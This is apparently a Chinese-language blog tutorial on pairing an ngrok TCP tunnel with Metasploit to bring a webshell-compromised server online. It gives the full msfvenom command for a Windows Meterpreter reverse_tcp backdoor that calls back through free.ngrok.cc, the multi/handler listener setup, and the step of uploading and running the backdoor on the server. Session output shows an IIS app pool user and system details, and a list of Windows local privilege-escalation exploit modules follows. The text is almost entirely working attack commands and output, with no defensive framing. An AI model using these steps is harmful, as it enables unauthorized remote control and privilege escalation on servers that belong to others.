ngrok 内网穿透, 搭配 metasploit 实现 webshell 上线.
ngrok.cc 注册账号 开通隧道 类型 tcp
下载客户端
我的是 linux arm
运行
./sunny clientid xxxx
下面用 msfvenom 生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=端口 -f exe > /tmp/test.exe
端口填之前开通隧道的远程端口
1
2
3
4
5
6
|
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=端口 -f exe > test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
|
监听
1
2
3
4
5
|
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 端口
|
端口填之前开通隧道的本地端口
0.0.0.0 是为了监听所有地址
1
2
|
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
|
将生成的程序上传至服务器执行
成功反弹会话
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (179779 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55460) at 2018-02-23 19:01:59 +0800
meterpreter> getuid
Server username IIS APPPOOL\baidu
meterpreter> sysinfo
Computer: WIN-XXOO
OS: Windows 2012 (Build 9200)
Architecture: x64
System Language: zh_CN
Domain: WORKGROUP
Logged on Users: 5
Meterpreter: x86/windows
meterpreter>
|
本地提权 exp 在 exploit/windows/local/ 下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
msf exploit(multi/handler) > use exploit/windows/local/ms
use exploit/windows/local/ms10_015_kitrap0d
use exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms11_080_afdjoinleaf
use exploit/windows/local/ms13_005_hwnd_broadcast
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ms14_009_ie_dfsvc
use exploit/windows/local/ms14_058_track_popup_menu
use exploit/windows/local/ms14_070_tcpip_ioctl
use exploit/windows/local/ms15_004_tswbproxy
use exploit/windows/local/ms15_051_client_copy_image
use exploit/windows/local/ms15_078_atmfd_bof
use exploit/windows/local/ms16_016_webdav
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
use exploit/windows/local/ms_ndproxy
|